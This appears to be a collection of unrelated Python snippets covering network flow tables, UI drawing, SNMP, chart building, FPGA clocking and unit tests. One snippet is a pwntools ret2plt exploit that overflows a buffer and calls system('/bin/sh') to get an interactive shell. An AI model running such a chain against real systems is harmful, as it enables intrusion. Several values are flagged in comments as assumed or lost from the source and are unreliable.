return [self.classification_table.flowdrop(self.classification_table.match(**match_dict), priority=(self.filter_priority + priority_offset))]
def select_packets(self, target_table, match_dict, actions=None, priority_offset=0):
inst = [target_table.goto_this()]
if (actions is not None):
inst.append(valve_of.apply_actions(actions))
return [self.classification_table.flowmod(self.classification_table.match(**match_dict), priority=(self.select_priority + priority_offset), inst=tuple(inst))]
def remove_filter(self, match_dict, strict=True, priority_offset=0):
priority = None
if strict:
priority = (self.filter_priority + priority_offset)
return [self.classification_table.flowdel(self.classification_table.match(**match_dict), priority=priority, strict=strict)] |
def pwn():
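# ret2plt chain: after 108+4 bytes of padding, call read(0, binsh_addr, 8)
# to write '/bin/sh\x00' into a known writable address; the pppr gadget pops
# the three arguments, then system(binsh_addr) spawns the shell, with
# _start as system's return address so the binary restarts cleanly.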
payload = ('A' * (108 + 4))
payload += p32(read_plt)
payload += p32(pppr_addr)
payload += p32(0)
payload += p32(binsh_addr)
payload += p32(8)
payload += p32(system_addr)
payload += p32(_start_addr)
payload += p32(binsh_addr)
io.send(payload)
io.send('/bin/sh\x00')
io.interactive() |
def test():
assert ('from spacy.tokens import Doc' in __solution__), 'Doc?'
assert (len(spaces) == 4), 'Doc?'
assert all((isinstance(s, bool) for s in spaces)), 'spaces'
assert ([int(s) for s in spaces] == [0, 0, 0, 0]), '?'
assert (doc.text == '!'), 'Doc?'
__msg__.good('Nice!') |
class RectDecoration(_Decoration, GroupMixin):
defaults = [('filled', False, 'Whether to fill shape'), ('radius', 4, 'Corner radius as int or list of ints [TL TR BR BL]. 0 is square'), ('colour', '#000000', 'Colour for decoration'), ('line_width', 0, 'Line width for decoration'), ('line_colour', '#ffffff', 'Colour of border'), ('use_widget_background', False, "Paint the decoration using the colour from the widget's `background` property. The widget's background will then be the bar's background colour."), ('clip', False, 'Clip contents of widget to decoration area.')]
_screenshots = [('rect_decoration.png', 'Single decoration'), ('rect_decoration_stacked.png', 'Two decorations stacked')]
def __init__(self, **config):
_Decoration.__init__(self, **config)
self.add_defaults(GroupMixin.defaults)
self.add_defaults(RectDecoration.defaults)
self.corners = self.single_or_four(self.radius, 'Corner radius')
def _draw_path(self, clip=False):
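# Trace the outline as four arcs, one per corner, in the order top-left,
# top-right, bottom-right, bottom-left (matching the [TL TR BR BL] radius
# list); grouped widgets round only their outer corners so adjacent
# decorations join seamlessly.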
ctx = self.ctx
ctx.new_path()
diff = ((self.line_width / 2) if clip else 0)
box_height = (self.height - (2 * self.padding_y))
box_width = (self.width - (2 * self.padding_x))
first = False
last = False
if ((not self.radius) and (not self.group)):
ctx.rectangle(self.padding_x, self.padding_y, box_width, box_height)
else:
if (self.group and (self.parent in self.parent.bar.widgets)):
corners = [0, 0, 0, 0]
if self.is_first:
first = True
corners[0] = self.corners[0]
corners[3] = self.corners[3]
if self.is_last:
last = True
corners[1] = self.corners[1]
corners[2] = self.corners[2]
else:
corners = self.corners
first = True
last = True
degrees = (math.pi / 180.0)
radius = corners[0]
delta = (radius + (self.line_width / 2))
y = ((self.padding_y + delta) + diff)
if first:
x = (self.padding_x + delta)
else:
radius = max((radius - diff), 0)
x = ((- self.line_width) + diff)
ctx.arc(x, y, radius, (180 * degrees), (270 * degrees))
radius = corners[1]
delta = (radius + (self.line_width / 2))
y = ((self.padding_y + delta) + diff)
if last:
x = ((self.padding_x + box_width) - delta)
else:
radius = max((radius - diff), 0)
x = ((self.width + self.line_width) - diff)
ctx.arc(x, y, radius, ((- 90) * degrees), (0 * degrees))
radius = corners[2]
delta = (radius + (self.line_width / 2))
y = (((self.padding_y + box_height) - delta) - diff)
if last:
x = ((self.padding_x + box_width) - delta)
else:
radius = max((radius - diff), 0)
x = ((self.width + self.line_width) - diff)
ctx.arc(x, y, radius, (0 * degrees), (90 * degrees))
radius = corners[3]
delta = (radius + (self.line_width / 2))
y = (((self.padding_y + box_height) - delta) - diff)
if first:
x = (self.padding_x + delta)
else:
radius = max((radius - diff), 0)
x = ((- self.line_width) + diff)
ctx.arc(x, y, radius, (90 * degrees), (180 * degrees))
ctx.close_path()
def draw(self) -> None:
self.drawer.ctx.reset_clip()
self._draw_path()
if self.filled:
self.fill_colour = (self.parent.background if self.use_widget_background else self.colour)
self.set_source_rgb(self.fill_colour)
self.ctx.fill_preserve()
if self.line_width:
self.ctx.set_line_width(self.line_width)
self.set_source_rgb(self.line_colour)
self.ctx.stroke()
if self.clip:
self._draw_path(clip=True)
self.ctx.clip()
else:
self.ctx.new_path() |
class NoAuth(base.AbstractAuthenticationService):
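# Null authentication service: passphrase hashing and key localization are
# no-ops, and any attempt to authenticate an outgoing or incoming message
# reports the noAuthentication error indication.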
SERVICE_ID = (1, 3, 6, 1, 6, 3, 10, 1, 1, 1)
def hashPassphrase(self, authKey):
return
def localizeKey(self, authKey, snmpEngineID):
return
def authenticateOutgoingMsg(self, authKey, wholeMsg):
raise error.StatusInformation(errorIndication=errind.noAuthentication)
def authenticateIncomingMsg(self, authKey, authParameters, wholeMsg):
raise error.StatusInformation(errorIndication=errind.noAuthentication) |
class CatalogItemAppLinks(AbstractObject):
def __init__(self, api=None):
super(CatalogItemAppLinks, self).__init__()
self._isCatalogItemAppLinks = True
self._api = api
class Field(AbstractObject.Field):
android = 'android'
ios = 'ios'
ipad = 'ipad'
iphone = 'iphone'
web = 'web'
windows = 'windows'
windows_phone = 'windows_phone'
windows_universal = 'windows_universal'
_field_types = {'android': 'list<AndroidAppLink>', 'ios': 'list<IosAppLink>', 'ipad': 'list<IosAppLink>', 'iphone': 'list<IosAppLink>', 'web': 'WebAppLink', 'windows': 'list<WindowsAppLink>', 'windows_phone': 'list<WindowsPhoneAppLink>', 'windows_universal': 'list<WindowsAppLink>'}
@classmethod
def _get_field_enum_info(cls):
field_enum_info = {}
return field_enum_info |
class Choropleth(GraphChartJs.Chart):
name = 'ChartJs Choropleth'
tag = 'canvas'
requirements = ('chartjs-chart-geo',)
geo_map = ''  # map topology reference truncated in the source
_option_cls = OptChartJs.OptionsGeo
_chart__type = 'choropleth'
builder_name = 'GeoChoropleth'
@property
def options(self) -> OptChartJs.OptionsGeo:
return super().options
@packageImport('chartjs')
def build(self, data: types.JS_DATA_TYPES=None, options: types.JS_DATA_TYPES=None, profile: types.PROFILE_TYPE=None, component_id: str=None, stop_state: bool=True, dataflows: List[dict]=None):
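# Emits the client-side JS call that (re)builds the chart; when stop_state
# is set, the callback first hides the component's loading state.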
self.js_code = component_id
callbacks = '(function(){})'
if stop_state:
callbacks = ('(function(){%s})' % self.hide_state(self.html_code))
return ('%(builder)s(%(htmlObj)s, %(data)s, %(options)s, %(map)s, %(callbacks)s)' % {'data': (data or []), 'options': self.getCtx(), 'builder': self.builder_name, 'callbacks': callbacks, 'htmlObj': (component_id or self.dom.varId), 'map': JsUtils.dataFlows(data, dataflows, self.page)})
def __str__(self):
self.page.properties.js.add_builders(self.refresh())
return ('<div><%s %s></%s></div>' % (self.tag, self.get_attrs(css_class_names=self.style.get_classes()), self.tag)) |
def update_export_kwargs_from_export_method(old_f):
def new_f(cls, model, input_args, save_path, export_method, **export_kwargs):
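# Parse "triggering words" embedded in export_method (e.g. '_mobile',
# '@scripting', '@tracing', '_int8'), translate each into the matching
# export kwarg, and strip it so only the base method name remains.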
if (export_method is not None):
assert isinstance(export_method, str)
original_export_method = export_method
if ('_mobile' in export_method):
if ('mobile_optimization' in export_kwargs):
logger.warning('`mobile_optimization` is already specified, keep using it')
else:
if ('-metal' in export_method):
mobile_opt_config = MobileOptimizationConfig(backend='metal')
export_method = export_method.replace('-metal', '', 1)
elif ('-vulkan' in export_method):
mobile_opt_config = MobileOptimizationConfig(backend='vulkan')
export_method = export_method.replace('-vulkan', '', 1)
else:
mobile_opt_config = MobileOptimizationConfig()
export_kwargs['mobile_optimization'] = mobile_opt_config
export_method = export_method.replace('_mobile', '', 1)
if ('@scripting' in export_method):
jit_mode = export_kwargs.get('jit_mode', None)
if (jit_mode and (jit_mode != 'script')):
logger.warning('`jit_mode` is already specified as {}, overwrite it to `script` since `@scripting` appears in export_method'.format(jit_mode))
export_kwargs['jit_mode'] = 'script'
export_method = export_method.replace('@scripting', '', 1)
if ('@tracing' in export_method):
jit_mode = export_kwargs.get('jit_mode', None)
if (jit_mode and (jit_mode != 'trace')):
logger.warning('`jit_mode` is already specified as {}, overwrite it to `trace` since `@tracing` appears in export_method'.format(jit_mode))
export_kwargs['jit_mode'] = 'trace'
export_method = export_method.replace('@tracing', '', 1)
if ('_int8' in export_method):
export_method = export_method.replace('_int8', '', 1)
if (export_method != 'torchscript'):
logger.warning('Suspicious export_method after removing triggering words, original export_method: {}, remaining: {}'.format(original_export_method, export_method))
return old_f(cls, model, input_args, save_path, export_method, **export_kwargs)
return new_f |
def _test_success_with_all_filters_place_of_performance_county(client):
resp = client.post('/api/v2/search/spending_by_geography', content_type='application/json', data=json.dumps({'scope': 'place_of_performance', 'geo_layer': 'county', 'filters': non_legacy_filters()}))
assert (resp.status_code == status.HTTP_200_OK), 'Failed to return 200 Response' |
class SizeNode(GivElm):
total = 0
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.size = kwargs['size']
def __repr__(self):
return str(self.size)
def __str__(self):
return repr(self)
def stat(self):
super().stat()
SizeNode.total += 1 |
class OefSearchDialogue(BaseOefSearchDialogue):
__slots__ = ('_is_seller_search',)
def __init__(self, dialogue_label: DialogueLabel, self_address: Address, role: Dialogue.Role, message_class: Type[OefSearchMessage]=OefSearchMessage) -> None:
BaseOefSearchDialogue.__init__(self, dialogue_label=dialogue_label, self_address=self_address, role=role, message_class=message_class)
self._is_seller_search = None
@property
def is_seller_search(self) -> bool:
if (self._is_seller_search is None):
raise ValueError('is_seller_search not set!')
return self._is_seller_search
@is_seller_search.setter
def is_seller_search(self, is_seller_search: bool) -> None:
enforce((self._is_seller_search is None), 'is_seller_search already set!')
self._is_seller_search = is_seller_search |
def test_deposit_sets_end_dynasty(concise_casper, funded_account, validation_key, deposit_amount, deposit_validator):
validator_index = deposit_validator(funded_account, validation_key, deposit_amount)
expected_end_dynasty = 1000000000000000000000000000000  # the contract's DEFAULT_END_DYNASTY sentinel (10**30, assumed)
assert (concise_casper.validators__end_dynasty(validator_index) == expected_end_dynasty) |
class _CRG(Module, AutoCSR):
def __init__(self, platform, sys_clk_freq):
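# Two cascaded PLLs: main_pll locks to the board clock and exposes its DRP
# port (so sys_clk_freq can be retuned at runtime), while the second PLL
# derives the actual sys/sys4x domains from main_pll's output.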
self.rst = Signal()
self.clock_domains.cd_sys_pll = ClockDomain()
self.clock_domains.cd_sys = ClockDomain()
self.clock_domains.cd_sys4x = ClockDomain(reset_less=True)
self.clock_domains.cd_clk200 = ClockDomain()
self.clock_domains.cd_uart = ClockDomain()
self.submodules.main_pll = main_pll = S7PLL(speedgrade=(- 2))
self.comb += main_pll.reset.eq(platform.request('cpu_reset'))
main_pll.register_clkin(platform.request('clk200'), 200e6)
main_pll.create_clkout(self.cd_sys_pll, sys_clk_freq)
main_pll.create_clkout(self.cd_clk200, 200e6)
main_pll.create_clkout(self.cd_uart, 100e6)  # assumed; original frequency lost in the source
main_pll.expose_drp()
self.submodules.idelayctrl = S7IDELAYCTRL(self.cd_clk200)
self.submodules.pll = pll = S7PLL(speedgrade=(- 2))
self.comb += pll.reset.eq(((~ main_pll.locked) | self.rst))
pll.register_clkin(self.cd_sys_pll.clk, sys_clk_freq)
pll.create_clkout(self.cd_sys, sys_clk_freq)
pll.create_clkout(self.cd_sys4x, (4 * sys_clk_freq))
self.sys_clk_counter = CSRStatus(32)
self.sync += self.sys_clk_counter.status.eq((self.sys_clk_counter.status + 1)) |
def test_mem_from_cgroup2_max_handling(elasticapm_client, tmpdir):
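# cgroup v2 writes the literal string 'max' into memory.max when no limit
# is configured; the metricset should then omit the cgroup memory
# limit/usage samples rather than report a bogus number.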
proc_stat_self = os.path.join(tmpdir.strpath, 'self-stat')
proc_stat = os.path.join(tmpdir.strpath, 'stat')
proc_meminfo = os.path.join(tmpdir.strpath, 'meminfo')
cgroup2_memory_limit = os.path.join(tmpdir.strpath, 'slice', 'memory.max')
cgroup2_memory_usage = os.path.join(tmpdir.strpath, 'slice', 'memory.current')
cgroup2_memory_stat = os.path.join(tmpdir.strpath, 'slice', 'memory.stat')
cgroup2_self_cgroup = os.path.join(tmpdir.strpath, 'cgroup')
proc_self_cgroup = os.path.join(tmpdir.strpath, 'cgroup')
os.mkdir(os.path.join(tmpdir.strpath, 'slice'))
proc_self_mount = os.path.join(tmpdir.strpath, 'mountinfo')
for (path, content) in ((proc_stat, TEMPLATE_PROC_STAT_DEBIAN.format(user=0, idle=0)), (proc_stat_self, TEMPLATE_PROC_STAT_SELF.format(utime=0, stime=0)), (proc_meminfo, TEMPLATE_PROC_MEMINFO), (cgroup2_memory_limit, 'max'), (cgroup2_memory_usage, TEMPLATE_CGROUP_MEM_USAGE_IN_BYTES), (cgroup2_memory_stat, TEMPLATE_CGROUP_MEM_STAT), (cgroup2_self_cgroup, '9:memory:/slice'), (proc_self_mount, (('30 23 0:26 / ' + tmpdir.strpath) + ' rw,nosuid,nodev,noexec,relatime shared:4 - cgroup2 cgroup rw,seclabel\n'))):
with open(path, mode='w') as f:
f.write(content)
metricset = CPUMetricSet(MetricsRegistry(elasticapm_client), sys_stats_file=proc_stat, process_stats_file=proc_stat_self, memory_stats_file=proc_meminfo, proc_self_cgroup=proc_self_cgroup, mount_info=proc_self_mount)
data = next(metricset.collect())
assert ('system.process.cgroup.memory.mem.limit.bytes' not in data['samples'])
assert ('system.process.cgroup.memory.mem.usage.bytes' not in data['samples']) |
@pytest.mark.parametrize('series_of_diffs, expected_updates, expected_deletions', (((), {}, []), (({}, {}), {}, []), (({b'1': b'1'}, {b'1': None}), {}, [b'1']), (({b'1': b'1'}, {b'1': b'2'}), {b'1': b'2'}, []), (({b'1': None},), {}, [b'1']), (({b'2': b'3'},), {b'2': b'3'}, [])))
def test_db_diff_inspection(series_of_diffs, expected_updates, expected_deletions):
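# Each dict in series_of_diffs is one tracker generation: a None value
# records a deletion, anything else an upsert; DBDiff.join must collapse
# the sequence into the final pending/deleted key sets.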
diffs = []
for changes in series_of_diffs:
tracker = DBDiffTracker()
for (key, val) in changes.items():
if (val is None):
del tracker[key]
else:
tracker[key] = val
diffs.append(tracker.diff())
actual_diff = DBDiff.join(diffs)
if expected_updates:
(expected_keys, _) = zip(*expected_updates.items())
else:
expected_keys = ()
assert (actual_diff.pending_keys() == expected_keys)
assert (actual_diff.pending_items() == tuple(expected_updates.items()))
assert (actual_diff.deleted_keys() == tuple(expected_deletions)) |